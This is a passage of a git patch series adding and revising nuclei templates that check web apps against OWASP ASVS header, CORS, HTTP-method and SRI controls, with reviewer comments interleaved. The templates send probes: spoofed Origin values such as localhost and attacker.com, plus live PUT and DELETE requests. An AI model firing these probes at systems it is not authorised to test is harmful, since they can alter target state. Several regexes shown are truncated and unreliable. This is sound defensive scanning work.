true + matchers: + - type: word + name: 'Strict-Transport-Security (HSTS) header does not exist.' + part: header + negative: true + words: + - 'Strict-Transport-Security:' + - type: regex + name: "Strict-Transport-Security (HSTS) header does not include subdomains." + negative: true + regex: + - (?i)Strict-Transport-Security:\s*.*\bincludeSubdomains\b + part: header From aec60c85b28c21077dd4c3f8c898a7e50b1abab4 Mon Sep 17 00:00:00 2001 From: Hamed Salimian Date: Wed, 27 Sep 2023 15:14:13 +0330 Subject: [PATCH 050/129] Update 14.4.5.yaml Signed-off-by: Hamed Salimian --- templates/14.4.5.yaml | 4 ++-- 1 file changed, 2 insertions(+), 2 deletions(-) diff --git a/templates/14.4.5.yaml b/templates/14.4.5.yaml index 54e39ff..796e42f 100644 --- a/templates/14.4.5.yaml +++ b/templates/14.4.5.yaml 
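Review bot: nothing in the new 14.4.5 template checks `max-age`: a response of `Strict-Transport-Security: max-age=0; includeSubDomains`, which actually clears the HSTS policy, passes both matchers. Add a regex extractor for `max-age=(\d+)` with `internal: true` and a `dsl` matcher comparing it to the 15724800 threshold cited in the description. With the default `or` condition, an absent header satisfies both negative matchers (the `includeSubdomains` regex cannot match a header that is not there), so one problem yields two findings; `stop-at-first-match` does not help because it applies to multi-request templates. The `word` matcher on `Strict-Transport-Security:` is also case-sensitive and will miss the lowercase HTTP/2 form.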
@@ -31,13 +31,13 @@ http: stop-at-first-match: true matchers: - type: word - name: 'Strict-Transport-Security (HSTS) header does not exist.' + name: "'Strict-Transport-Security' (HSTS) header does not exist." part: header negative: true words: - 'Strict-Transport-Security:' - type: regex - name: "Strict-Transport-Security (HSTS) header does not include subdomains." + name: "'Strict-Transport-Security' (HSTS) header does not include subdomains." negative: true regex: - (?i)Strict-Transport-Security:\s*.*\bincludeSubdomains\b From 036dbe64b018a39d9db2f83d272a0d8202b6e82f Mon Sep 17 00:00:00 2001 From: Hamed Salimian Date: Wed, 27 Sep 2023 15:15:41 +0330 Subject: [PATCH 051/129] Create 14.4.6.yaml Signed-off-by: Hamed Salimian --- templates/14.4.6.yaml | 44 +++++++++++++++++++++++++++++++++++++++++++ 1 file changed, 44 insertions(+) create mode 100644 templates/14.4.6.yaml diff --git a/templates/14.4.6.yaml b/templates/14.4.6.yaml new file mode 100644 index 0000000..1879bb8 --- /dev/null +++ b/templates/14.4.6.yaml 
@@ -0,0 +1,44 @@ +id: ASVS-4-0-3-V14-4-6 + +info: + name: ASVS 14.4.6 Check + author: Hamed Salimian + severity: low + classification: + cwe-id: CWE-116 + reference: + - https://cheatsheetseries.owasp.org/cheatsheets/HTTP_Headers_Cheat_Sheet.html#referrer-policy + tags: asvs,14.4.6 + description: | + Verify that a suitable Referrer-Policy header is included to avoid exposing sensitive information in the URL through the Referer header to untrusted parties. + +http: + - raw: + - | + GET {{BaseURL}} HTTP/1.1 + Host: {{Hostname}} + Connection: close + User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/116.0.0.0 Safari/537.36 + Accept: */* + + extractors: + - type: kval + name: "Referrer-Policy" + part: header + kval: + - Referrer_Policy + + matchers-condition: and + matchers: + - type: regex + name: "'Referrer-Policy' header does not exist or does not contain 'strict-origin-when-cross-origin'" + negative: true + regex: + - (?i)Referrer-Policy:\s*.*\bstrict-origin-when-cross-origin\b + part: header + - type: regex + name: "referrer policy inside HTML meta tag does not exist or does not contain 'strict-origin-when-cross-origin'." + negative: true + regex: + - (?i) + part: body From 59240357af8adbb45fa92ae50b857b22375c2072 Mon Sep 17 00:00:00 2001 From: Hamed Salimian Date: Wed, 27 Sep 2023 18:32:10 +0330 Subject: [PATCH 052/129] Create 14.4.7.yaml Signed-off-by: Hamed Salimian --- templates/14.4.7.yaml | 56 +++++++++++++++++++++++++++++++++++++++++++ 1 file changed, 56 insertions(+) create mode 100644 templates/14.4.7.yaml diff --git a/templates/14.4.7.yaml b/templates/14.4.7.yaml new file mode 100644 index 0000000..63fe662 --- /dev/null +++ b/templates/14.4.7.yaml 
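Review bot: both matchers in the new 14.4.6 template require the literal `strict-origin-when-cross-origin`, so the stricter policies `no-referrer`, `same-origin` and `strict-origin`, which leak less than the required value, are reported as failures even though the description only asks for a "suitable" policy; widen the alternation to `(no-referrer|same-origin|strict-origin|strict-origin-when-cross-origin)` and keep `no-referrer-when-downgrade` and `unsafe-url` as failures. The meta-tag regex again appears as a bare `(?i)`; under `matchers-condition: and` with a negative matcher that means the template never fires, so the committed pattern needs checking.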
@@ -0,0 +1,56 @@ +id: ASVS-4-0-3-V14-4-7 + +info: + name: ASVS 14.4.7 Check + author: Hamed Salimian + severity: low + classification: + cwe-id: CWE-1021 + reference: + - https://cheatsheetseries.owasp.org/cheatsheets/HTTP_Headers_Cheat_Sheet.html#x-frame-options + - https://cheatsheetseries.owasp.org/cheatsheets/HTTP_Headers_Cheat_Sheet.html#content-security-policy + tags: asvs,14.4.7 + description: | + Verify that the content of a web application cannot be embedded in a third-party site by default and that embedding of the exact resources is only allowed where necessary by using suitable Content-Security-Policy: frame-ancestors and X-Frame-Options response headers. + +http: + - raw: + - | + GET {{BaseURL}} HTTP/1.1 + Host: {{Hostname}} + Connection: close + User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/116.0.0.0 Safari/537.36 + Accept: */* + + extractors: + - type: kval + name: "X-Frame-Options header" + part: header + kval: + - X_Frame_Options + - type: kval + name: "Content-Security-Policy header" + part: header + kval: + - Content_Security_Policy + - type: regex + name: 'Content Security Policy (CSP) Meta Tag' + part: body + regex: + - (?i) + + matchers-condition: and + matchers: + - type: regex + name: "'X-Frame-Options' header with 'DENY' or 'SAMEORIGIN' and 'Content-Security-Policy' (CSP) header with 'frame-ancestors' directive do not exist." + negative: true + regex: + - (?i)X-Frame-Options:\s*.*\b(DENY|SAMEORIGIN)\b + - (?i)Content-Security-Policy:[^;]*frame-ancestors + part: header + - type: regex + name: "Content Security Policy (CSP) inside HTML meta tag with 'frame-ancestors' directive does not exist." + negative: true + regex: + - (?i)]*content=["'][^"']*frame-ancestors[^"']*["'][^>]*> + part: body From 0d5ccba492fda324c6ae64e680440036949b981e Mon Sep 17 00:00:00 2001 From: Hamed Salimian Date: Fri, 29 Sep 2023 12:28:36 +0330 Subject: [PATCH 053/129] Update 13.2.1.yaml 
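Review bot: `(?i)Content-Security-Policy:[^;]*frame-ancestors` only matches when `frame-ancestors` is the first directive; an ordinary policy such as `default-src 'self'; frame-ancestors 'none'` is missed and, if `X-Frame-Options` is absent as well, the site is reported as unprotected. Use `(?i)Content-Security-Policy:.*\bframe-ancestors\b` or the dsl `contains(tolower(content_security_policy), "frame-ancestors")`. The second matcher accepts `frame-ancestors` inside a `<meta>` tag, but the CSP specification says that directive is ignored when delivered via `<meta http-equiv>`, so a meta-only policy gives no clickjacking protection and must not suppress the finding; drop the body matcher or emit it as a separate informational result. The meta pattern is also shown here starting at `]*content=`, i.e. without its `<meta` prefix.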
Signed-off-by: Hamed Salimian --- templates/13.2.1.yaml | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/templates/13.2.1.yaml b/templates/13.2.1.yaml index 5e3f4b0..9a99776 100644 --- a/templates/13.2.1.yaml +++ b/templates/13.2.1.yaml @@ -3,7 +3,7 @@ id: ASVS-4-0-3-V13-2-1 info: name: ASVS 13.2.1 Check author: Hamed Salimian - severity: high + severity: medium classification: cwe-id: CWE-650 reference: From 9e28ca84dae6a2ecab3f61a63893d2d8f4dacc1a Mon Sep 17 00:00:00 2001 From: Hamed Salimian Date: Sun, 1 Oct 2023 04:58:11 +0000 Subject: [PATCH 054/129] Update Submodule --- Vulnerable-Pages | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/Vulnerable-Pages b/Vulnerable-Pages index 982975c..507f941 160000 --- a/Vulnerable-Pages +++ b/Vulnerable-Pages @@ -1 +1 @@ -Subproject commit 982975c8775116be62cd507660d125e888f17b4a +Subproject commit 507f941014b049f142efe02c3bda411c34b376e2 From 0cb2b6b1179f21b4b09b938f8f6cb3b834322a5c Mon Sep 17 00:00:00 2001 From: Hamed Salimian Date: Fri, 6 Oct 2023 15:28:21 +0330 Subject: [PATCH 055/129] Create 14.5.2.yaml Signed-off-by: Hamed Salimian --- templates/14.5.2.yaml | 48 +++++++++++++++++++++++++++++++++++++++++++ 1 file changed, 48 insertions(+) create mode 100644 templates/14.5.2.yaml diff --git a/templates/14.5.2.yaml b/templates/14.5.2.yaml new file mode 100644 index 0000000..16eb225 --- /dev/null +++ b/templates/14.5.2.yaml 
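Review bot: the 13.2.1 hunk lowers `severity` from `high` to `medium` with no rationale in the commit message; a one-line justification (for example that an enabled method is a configuration finding until a writable path is confirmed) would let future maintainers know the change was deliberate. The submodule bump is fine but would also benefit from a note on what changed in `Vulnerable-Pages`.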
@@ -0,0 +1,48 @@ +id: ASVS-4-0-3-V14-5-2 + +info: + name: ASVS 14.5.2 Check + author: Hamed Salimian + severity: low + classification: + cwe-id: CWE-346 + reference: + - https://snbig.github.io/Vulnerable-Pages/ASVS_14_5_2/ + tags: asvs,14.5.2 + description: | + Verify that the supplied Origin header is not used for authentication or access control decisions, as the Origin header can easily be changed by an attacker. + +variables: + forbidden_status_code: 403 + +http: + - raw: + - | + GET {{BaseURL}} HTTP/1.1 + Host: {{Hostname}} + Origin: {{origin_schema}}{{origin_host}}{{origin_port}} + User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/116.0.0.0 Safari/537.36 + Accept: */* + + cookie-reuse: true + payloads: + origin_host: + - 127.0.0.1 + - localhost + - '{{resolve("{{FQDN}}")}}' + origin_schema: + - http:// + - https:// + origin_port: + - + - :80 + - :443 + attack: clusterbomb + + stop-at-first-match: true + matchers: + - type: dsl + name: 'Access Restriction Bypass Via Origin Spoof' + dsl: + - status_code < 210 && status_code >= 200 + - to_number(forbidden_status_code) != status_code From e5c8223e658e00abec315eddf20bda8f7c4d4704 Mon Sep 17 00:00:00 2001 From: Hamed Salimian Date: Fri, 6 Oct 2023 19:40:51 +0330 Subject: [PATCH 056/129] Create 14.5.3.yaml Signed-off-by: Hamed Salimian --- templates/14.5.3.yaml | 50 +++++++++++++++++++++++++++++++++++++++++++ 1 file changed, 50 insertions(+) create mode 100644 templates/14.5.3.yaml diff --git a/templates/14.5.3.yaml b/templates/14.5.3.yaml new file mode 100644 index 0000000..1d48bd1 --- /dev/null +++ b/templates/14.5.3.yaml 
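Review bot: the two `dsl` lines in the new 14.5.2 template run under the default `or` condition, so `to_number(forbidden_status_code) != status_code` alone fires on any non-403 answer (404, 302, 500) and the template reports "Access Restriction Bypass Via Origin Spoof" on nearly every target; add `condition: and` under the matcher or fold both expressions into one. Even with `and`, a 2xx with a spoofed `Origin` is only a bypass if the same request without it is denied; send a baseline request first, keep its status in an `internal: true` extractor, and compare. The empty item in `origin_port` (a `-` with nothing after it) parses as YAML null rather than an empty string; write it as `- ""`. The clusterbomb expands to 3 x 2 x 3 = 18 requests, which should be recorded in `metadata.max-request`.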
@@ -0,0 +1,50 @@ +id: ASVS-4-0-3-V14-5-3 + +info: + name: ASVS 14.5.3 Check + author: Hamed Salimian + severity: low + classification: + cwe-id: CWE-346 + reference: + - https://owasp.org/www-project-web-security-testing-guide/v42/4-Web_Application_Security_Testing/11-Client-side_Testing/07-Testing_Cross_Origin_Resource_Sharing + - https://snbig.github.io/Vulnerable-Pages/ASVS_14_5_3/ + tags: asvs,14.5.3 + description: | + Verify that the Cross-Origin Resource Sharing (CORS) Access-Control-Allow-Origin header uses a strict allow list of trusted domains and subdomains to match against and does not support the "null" origin. + +http: + - method: DELETE + path: + - "{{BaseURL}}" + headers: + Host: "{{Hostname}}" + Access-Control-Request-Method: DELETE + Origin: https://attacker.com + Referer: https://attacker.com/ + User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/116.0.0.0 Safari/537.36 + Accept: "*/*" + + extractors: + - type: kval + part: header + name: "Access-Control-Allow-Origin header" + kval: + - Access_Control_Allow_Origin + + matchers: + - type: word + name: "Wildcard directive in Access-Control-Allow-Origin" + part: access_control_allow_origin + words: + - "*" + - type: word + name: "Access-Control-Allow-Origin reflects Origin header" + part: access_control_allow_origin + words: + - "attacker.com" + - type: word + name: "Access-Control-Allow-Origin is null" + part: access_control_allow_origin + words: + - "null" From a9d0830505f19d75a67c4db8bcf40ff09448621c Mon Sep 17 00:00:00 2001 From: Hamed Salimian Date: Sat, 14 Oct 2023 11:53:51 +0330 Subject: [PATCH 057/129] Update tab_contributing.md Signed-off-by: Hamed Salimian --- tab_contributing.md | 1 - 1 file changed, 1 deletion(-) diff --git a/tab_contributing.md b/tab_contributing.md index e1a150d..633a668 100644 --- a/tab_contributing.md +++ b/tab_contributing.md 
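Review bot: the new 14.5.3 template sends a live `DELETE` to `{{BaseURL}}` for what is a read-only header check; `Access-Control-Request-Method` is only meaningful on an `OPTIONS` preflight, so an `OPTIONS` (or `GET`) request with the same `Origin` header exercises the CORS policy without risking a state change on the target. The description says the `null` origin must be rejected, but the only request sends `Origin: https://attacker.com`, so the `Access-Control-Allow-Origin is null` matcher can never be triggered; add a second request with `Origin: null`. Relying on `part: access_control_allow_origin` works because nuclei exposes response headers under lowercased, underscored names, but a comment saying so would save the next reader a trip to the docs.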
@@ -15,4 +15,3 @@ For detailed information and guidelines about contributing in "ASVS evaluation t ### Core Team The project current core team are: - [Hamed Salimain](https://github.com/Snbig) (Project Leader) -- [Reza Saeedi](https://github.com/Reza-saeedi) From 80646a645c371f9712d67c56cf680c00b92f60cb Mon Sep 17 00:00:00 2001 From: Hamed Salimian Date: Sat, 14 Oct 2023 11:54:11 +0330 Subject: [PATCH 058/129] Update README.md Signed-off-by: Hamed Salimian --- README.md | 1 - 1 file changed, 1 deletion(-) diff --git a/README.md b/README.md index 091b4a0..3654252 100644 --- a/README.md +++ b/README.md @@ -23,5 +23,4 @@ For detailed information and guidelines about contributing in developing templat #### Core Team The project current core team are: - [Hamed Salimain](https://github.com/Snbig) (Project Leader) -- [Reza Saeedi](https://github.com/Reza-saeedi) From 000dbb1c1aba48fa1457943423f9aa1d21b6a29e Mon Sep 17 00:00:00 2001 From: Hamed Salimian Date: Mon, 16 Oct 2023 18:24:21 +0330 Subject: [PATCH 059/129] Update 13.2.1.yaml Signed-off-by: Hamed Salimian --- templates/13.2.1.yaml | 113 ++++-------------------------------------- 1 file changed, 9 insertions(+), 104 deletions(-) diff --git a/templates/13.2.1.yaml b/templates/13.2.1.yaml index 9a99776..1f57bb9 100644 --- a/templates/13.2.1.yaml +++ b/templates/13.2.1.yaml 
@@ -21,33 +21,21 @@ http: Host: "{{Hostname}}" Cookie: "{{Cookie}}" extractors: - - type: regex - name: "potentially risky methods (OPTIONS check)" - part: header - regex: - - "(PUT|DELETE|TRACE|PATCH|CONNECT)" - type: kval - name: "Access-Control-Allow-Methods" part: header kval: - Access_Control_Allow_Methods + - type: kval + part: header + kval: + - Allow matchers: - type: regex + name: "potentially risky methods (OPTIONS check)" part: header regex: - - "(PUT|DELETE|TRACE|PATCH|CONNECT)" - - - raw: - - | - {{to_upper(rand_text_alpha(4))}} {{Path}} HTTP/1.1 - Host: {{Hostname}} - Cookie: {{Cookie}} - extractors: - - type: dsl - internal: true - name: rand_resp - dsl: - - status_code + - (?i)Access-Control-Allow-Methods:\s*.*\b(PUT|DELETE)\b + - (?i)Allow:\s*.*\b(PUT|DELETE)\b - method: PUT path: @@ -58,19 +46,15 @@ http: body: "HTTP PUT Method is Enabled" extractors: - type: dsl - name: "PUT method is Enabled" dsl: - status_code - matchers-condition: and matchers: - type: status + name: "PUT method is Enabled" negative: true status: - 405 - 501 - - type: dsl - dsl: - - "(status_code < 210 && status_code >= 200) && (rand_resp != status_code)" - method: DELETE path: 
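Review bot: in the first hunk of templates/13.2.1.yaml the `Access-Control-Allow-Methods` extractor loses its `name:` and the new `Allow` kval extractor has none, so both header values are emitted without a label in the output; keeping a name on each (for example "Allow" and "Access-Control-Allow-Methods") keeps the two distinguishable. The regex rewrite itself is an improvement: anchoring `(?i)Access-Control-Allow-Methods:\s*.*\b(PUT|DELETE)\b` and `(?i)Allow:\s*.*\b(PUT|DELETE)\b` to the header name avoids the old `(PUT|DELETE|TRACE|PATCH|CONNECT)` matching anywhere in the headers, though it should be documented that PUT and DELETE are now the only methods this template reports.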
@@ -80,91 +64,12 @@ http: Cookie: "{{Cookie}}" extractors: - type: dsl - name: "DELETE method is Enabled" dsl: - status_code - matchers-condition: and - matchers: - - type: status - negative: true - status: - - 405 - - 501 - - type: dsl - negative: true - dsl: - - "(status_code < 600 && status_code >= 400) || (rand_resp == status_code)" - - - method: TRACE - path: - - "{{BaseURL}}" - headers: - Host: "{{Hostname}}" - Cookie: "{{Cookie}}" - extractors: - - type: dsl - name: "TRACE method is Enabled" - dsl: - - status_code - matchers-condition: and - matchers: - - type: status - negative: true - status: - - 405 - - 501 - - type: dsl - negative: true - dsl: - - "(status_code < 600 && status_code >= 400) || (rand_resp == status_code)" - - type: regex - part: body - regex: - - '^TRACE \S+ HTTP\/[0-9]\.[0-9]' - - - method: PATCH - path: - - "{{BaseURL}}" - headers: - Host: "{{Hostname}}" - Cookie: "{{Cookie}}" - body: "" - extractors: - - type: dsl - name: "PATCH method is Enabled" - dsl: - - status_code - matchers-condition: and - matchers: - - type: status - negative: true - status: - - 405 - - 501 - - type: dsl - negative: true - dsl: - - "(status_code < 600 && status_code >= 400) || (rand_resp == status_code)" - - - method: CONNECT - path: - - "{{BaseURL}}" - headers: - Host: "{{Hostname}}" - Cookie: "{{Cookie}}" - extractors: - - type: dsl - name: "CONNECT method is Enabled" - dsl: - - status_code - matchers-condition: and matchers: - type: status + name: "DELETE method is Enabled" negative: true status: - 405 - 501 - - type: dsl - negative: true - dsl: - - "(status_code < 600 && status_code >= 400) || (rand_resp == status_code)" From aadb20d82df2b9920c09525ed5ea43d60e937a2c Mon Sep 17 00:00:00 2001 From: Hamed Salimian Date: Mon, 16 Oct 2023 18:25:17 +0330 Subject: [PATCH 060/129] Create 14.5.1.yaml 
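Review bot: removing the random-method baseline (`{{to_upper(rand_text_alpha(4))}} {{Path}}` with its `rand_resp` extractor) and the comparison `rand_resp != status_code` / `rand_resp == status_code` means the PUT and DELETE checks in templates/13.2.1.yaml now rely solely on the response not being 405 or 501. A server that answers the same code to every method (a catch-all 200, or 403 from a gateway) will be reported as "PUT method is Enabled" / "DELETE method is Enabled". Either keep a baseline request to compare against, or require a 2xx on the PUT/DELETE itself, and state the limitation in the template description.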
Signed-off-by: Hamed Salimian --- templates/14.5.1.yaml | 48 +++++++++++++++++++++++++++++++++++++++++++ 1 file changed, 48 insertions(+) create mode 100644 templates/14.5.1.yaml diff --git a/templates/14.5.1.yaml b/templates/14.5.1.yaml new file mode 100644 index 0000000..cc9f89d --- /dev/null +++ b/templates/14.5.1.yaml @@ -0,0 +1,48 @@ +id: ASVS-4-0-3-V14-5-1 + +info: + name: ASVS 14.5.1 Check + author: Hamed Salimian + severity: medium + classification: + cwe-id: CWE-749 + reference: + - https://owasp.org/www-project-web-security-testing-guide/v42/4-Web_Application_Security_Testing/02-Configuration_and_Deployment_Management_Testing/06-Test_HTTP_Methods.html + tags: asvs,14.5.1 + description: | + Verify that the application server only accepts the HTTP methods in use by the application/API, including pre-flight OPTIONS, and logs/alerts on any requests that are not valid for the application context. + +http: + - method: TRACE + path: + - "{{BaseURL}}" + headers: + Host: "{{Hostname}}" + extractors: + - type: dsl + name: "TRACE method is Enabled" + dsl: + - status_code + matchers-condition: and + matchers: + - type: status + negative: true + status: + - 405 + - 501 + - type: regex + part: body + regex: + - '^TRACE \S+ HTTP\/[0-9]\.[0-9]' + + - raw: + - | + {{to_upper(rand_text_alpha(4))}} {{BaseURL}} HTTP/1.1 + Host: {{Hostname}} + matchers: + - type: status + name: "CUSTOM method is allowed." + negative: true + status: + - 405 + - 501 From 76b28c46a7cf630c50c5e7d29e60222ee19349b7 Mon Sep 17 00:00:00 2001 From: Hamed Salimian Date: Tue, 17 Oct 2023 07:54:15 +0330 Subject: [PATCH 061/129] Update 14.5.1.yaml Signed-off-by: Hamed Salimian --- templates/14.5.1.yaml | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/templates/14.5.1.yaml b/templates/14.5.1.yaml index cc9f89d..bdde8bd 100644 --- a/templates/14.5.1.yaml +++ b/templates/14.5.1.yaml 
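Review bot: the raw request in templates/14.5.1.yaml uses `{{to_upper(rand_text_alpha(4))}} {{BaseURL}} HTTP/1.1`, i.e. the absolute URL as request target, whereas the equivalent request removed from 13.2.1 used `{{Path}}`; many origin servers reject absolute-form targets with 400 regardless of the method, which would mask the result of the "CUSTOM method is allowed." check, so `{{Path}}` is the safer choice. A four-letter uppercase random token can also, rarely, be a real method (HEAD, POST); a fixed non-standard prefix with a random suffix avoids that collision. The TRACE check is sound as written because `matchers-condition: and` requires both a non-405/501 status and the `^TRACE \S+ HTTP\/[0-9]\.[0-9]` echo in the body.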
@@ -3,7 +3,7 @@ id: ASVS-4-0-3-V14-5-1 info: name: ASVS 14.5.1 Check author: Hamed Salimian - severity: medium + severity: low classification: cwe-id: CWE-749 reference: From 8d7fa6fe97819e09c0372dd19a521894b3404834 Mon Sep 17 00:00:00 2001 From: Hamed Salimian Date: Tue, 17 Oct 2023 05:31:37 +0000 Subject: [PATCH 062/129] Update 13.2.1 14.5.1 --- templates/13.2.1.yaml | 4 ++++ templates/14.5.1.yaml | 4 ++++ 2 files changed, 8 insertions(+) diff --git a/templates/13.2.1.yaml b/templates/13.2.1.yaml index 1f57bb9..d996df8 100644 --- a/templates/13.2.1.yaml +++ b/templates/13.2.1.yaml @@ -55,6 +55,8 @@ http: status: - 405 - 501 + - 400 + - 404 - method: DELETE path: @@ -73,3 +75,5 @@ http: status: - 405 - 501 + - 400 + - 404 diff --git a/templates/14.5.1.yaml b/templates/14.5.1.yaml index bdde8bd..ddb9334 100644 --- a/templates/14.5.1.yaml +++ b/templates/14.5.1.yaml @@ -30,6 +30,8 @@ http: status: - 405 - 501 + - 404 + - 400 - type: regex part: body regex: @@ -46,3 +48,5 @@ http: status: - 405 - 501 + - 404 + - 400 From ed4f9ed8ed3b487ba5158392d48b8533dc9bf691 Mon Sep 17 00:00:00 2001 From: Hamed Salimian Date: Sun, 12 Nov 2023 06:08:10 +0000 Subject: [PATCH 063/129] Add 14.3.2 workflow --- templates/workflows/14.3.2.yaml | 40 +++++++++++++++++++++++++++++++++ 1 file changed, 40 insertions(+) create mode 100644 templates/workflows/14.3.2.yaml diff --git a/templates/workflows/14.3.2.yaml b/templates/workflows/14.3.2.yaml new file mode 100644 index 0000000..ce7ab3e --- /dev/null +++ b/templates/workflows/14.3.2.yaml 
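Review bot: adding 400 and 404 to the negative status lists in templates/13.2.1.yaml and templates/14.5.1.yaml reduces false positives, but enumerating rejection codes is open-ended (403 from a WAF or reverse proxy is the obvious next one). Since the evidence that a method is accepted is a 2xx response, a positive check such as `status_code >= 200 && status_code < 300` (the expression the earlier 13.2.1 version used) is more robust than growing the `negative: true` list. Style: the two files list the new codes in different orders (`400, 404` vs `404, 400`).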
@@ -0,0 +1,40 @@ +id: ASVS-4-0-3-V14-3-2 + +info: + name: ASVS 14.3.2 Check + author: Hamed Salimian + severity: low + classification: + cwe-id: CWE-497 + reference: + - https://cheatsheetseries.owasp.org/cheatsheets/Error_Handling_Cheat_Sheet.html + tags: asvs,14.3.2,debug + description: | + Verify that web or application server and application framework debug modes are disabled in production to eliminate debug features, developer consoles, and unintended security disclosures. + +workflows: + - template: misconfiguration/symfony-debug.yaml + - template: exposures/logs/rails-debug-mode.yaml + - template: misconfiguration/debug/bottle-debug.yaml + - template: misconfiguration/debug/ampache-debug.yaml + - template: misconfiguration/laravel-debug-enabled.yaml + - template: misconfiguration/laravel-debug-infoleak.yaml + - template: misconfiguration/laravel-debug-error.yaml + - template: misconfiguration/aspx-debug-mode.yaml + - template: exposures/logs/jboss-seam-debug-page.yaml + - template: misconfiguration/struts-ognl-console.yaml + - template: exposures/logs/struts-problem-report.yaml + - template: misconfiguration/sitecore-debug-page.yaml + - template: exposures/logs/django-debug-exposure.yaml + - template: misconfiguration/rekognition-image-validation.yaml + - template: misconfiguration/browserless-debugger.yaml + - template: exposures/logs/struts-debug-mode.yaml + - template: misconfiguration/django-debug-detect.yaml + - template: misconfiguration/airflow/airflow-debug.yaml + - template: misconfiguration/php-debugbar-exposure.yaml + - template: misconfiguration/wamp-xdebug-detect.yaml + - template: misconfiguration/typo3-debug-mode.yaml + - template: exposures/logs/pyramid-debug-toolbar.yaml + - template: misconfiguration/php-errors.yaml + - template: vulnerabilities/jenkins/jenkins-stack-trace.yaml + - template: technologies/werkzeug-debugger-detect.yaml \ No newline at end of file From 4731fcae213cbb3cf9e76fad4daa8e80cbb78c14 Mon Sep 17 00:00:00 2001 
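Review bot: templates/workflows/14.3.2.yaml references templates by path from the public nuclei-templates collection (`misconfiguration/symfony-debug.yaml`, `exposures/logs/rails-debug-mode.yaml`, ...), none of which ship in this repository, and the CI job only copies this repo's `templates/` directory into `/home/runner/nuclei-templates`. Document that the workflow requires the official template set to be installed, and consider pinning which nuclei-templates release the paths were verified against, since those paths move between releases. The file also ends without a trailing newline (`\ No newline at end of file`).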
From: Hamed Salimian Date: Sat, 25 Nov 2023 07:20:55 +0000 Subject: [PATCH 064/129] Create 14.2.3.yaml --- templates/headless/14.2.3.yaml | 51 ++++++++++++++++++++++++++++++++++ 1 file changed, 51 insertions(+) create mode 100644 templates/headless/14.2.3.yaml diff --git a/templates/headless/14.2.3.yaml b/templates/headless/14.2.3.yaml new file mode 100644 index 0000000..c83b2d3 --- /dev/null +++ b/templates/headless/14.2.3.yaml 
@@ -0,0 +1,51 @@ +id: ASVS-4-0-3-V14-2-3 + +info: + name: ASVS 14.2.3 Check + author: Hamed Salimian + severity: low + classification: + cwe-id: CWE-829 + reference: + - https://cheatsheetseries.owasp.org/cheatsheets/Third_Party_Javascript_Management_Cheat_Sheet.html#subresource-integrity + tags: asvs,14.2.3 + description: | + Verify that if application assets, such as JavaScript libraries, CSS or web fonts, are hosted externally on a Content Delivery Network (CDN) or external provider, Subresource Integrity (SRI) is used to validate the integrity of the asset. + +headless: + - steps: + - args: + url: "{{BaseURL}}" + action: navigate + + - action: waitload + + - action: script + name: assets_with_external_fqdn + args: + code: | + () => { + var currentLocation = document.location.host; + var xpathExpression = "//*[self::script or self::link]" + + "[not(contains(@src, '" + currentLocation + "') or contains(@href, '" + currentLocation + "'))" + + " and ((contains(@href,'//') or contains(@src,'//')) and not(contains(translate(@integrity,'ABCDEFGHIJKLMNOPQRSTUVWXYZ','abcdefghijklmnopqrstuvwxyz'),'sha')))]"; + + var matchingNodes = document.evaluate(xpathExpression, document, null, XPathResult.ORDERED_NODE_SNAPSHOT_TYPE, null); + + var matchingTagsAsString = []; + for (var i = 0; i < matchingNodes.snapshotLength; i++) { + var node = matchingNodes.snapshotItem(i); + matchingTagsAsString.push(new XMLSerializer().serializeToString(node)); + } + return matchingTagsAsString.join(''); + } + + extractors: + - type: kval + kval: + - assets_with_external_fqdn + + matchers: + - type: dsl + dsl: + - len(assets_with_external_fqdn) > 0 \ No newline at end of file From e59032a9ef809146307681dc2ed3e37e4fc5aa4c Mon Sep 17 00:00:00 2001 From: Hamed Salimian Date: Sat, 25 Nov 2023 07:50:46 +0000 Subject: [PATCH 065/129] Update Submodule --- Vulnerable-Pages | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/Vulnerable-Pages b/Vulnerable-Pages index 507f941..fe1dced 160000 
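Review bot: the XPath in templates/headless/14.2.3.yaml selects every `link` element with an external `href`, not only stylesheets, so `<link rel="preconnect">`, `rel="dns-prefetch"`, `rel="canonical"`, `rel="icon"` and similar will be reported as assets missing SRI even though `integrity` does not apply to them; add a `rel` filter (stylesheet, and preload/modulepreload if desired) to the `self::link` branch. The `contains(@src, currentLocation)` / `contains(@href, currentLocation)` test is a substring match, so an external URL that merely contains the site's host (for instance in a query string) is treated as same-origin; an exact host comparison on the parsed URL is safer. Finally, web fonts pulled in from CSS `@font-face` rules are never seen by this DOM query, so the description's mention of fonts should be qualified.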
--- a/Vulnerable-Pages +++ b/Vulnerable-Pages @@ -1 +1 @@ -Subproject commit 507f941014b049f142efe02c3bda411c34b376e2 +Subproject commit fe1dced06e1e47a9985477251a8f02914d901031 From 5ed6cd14586204325781cc0ecb0adb7b0b1c047f Mon Sep 17 00:00:00 2001 From: Hamed Salimian Date: Sat, 25 Nov 2023 17:17:21 +0330 Subject: [PATCH 066/129] Update 14.2.3.yaml Signed-off-by: Hamed Salimian --- templates/headless/14.2.3.yaml | 10 +++++----- 1 file changed, 5 insertions(+), 5 deletions(-) diff --git a/templates/headless/14.2.3.yaml b/templates/headless/14.2.3.yaml index c83b2d3..95bc987 100644 --- a/templates/headless/14.2.3.yaml +++ b/templates/headless/14.2.3.yaml @@ -37,15 +37,15 @@ headless: var node = matchingNodes.snapshotItem(i); matchingTagsAsString.push(new XMLSerializer().serializeToString(node)); } - return matchingTagsAsString.join(''); + return matchingTagsAsString.join('|'); } extractors: - - type: kval - kval: - - assets_with_external_fqdn + - type: dsl + dsl: + - trim(split(assets_with_external_fqdn, '|'), '[]') matchers: - type: dsl dsl: - - len(assets_with_external_fqdn) > 0 \ No newline at end of file + - len(trim(split(assets_with_external_fqdn, '|'), '[]')) > 0 From 4f2281d491b7616dda14aaa42fc353eb6b369c9a Mon Sep 17 00:00:00 2001 From: Hamed Salimian Date: Mon, 11 Dec 2023 10:09:49 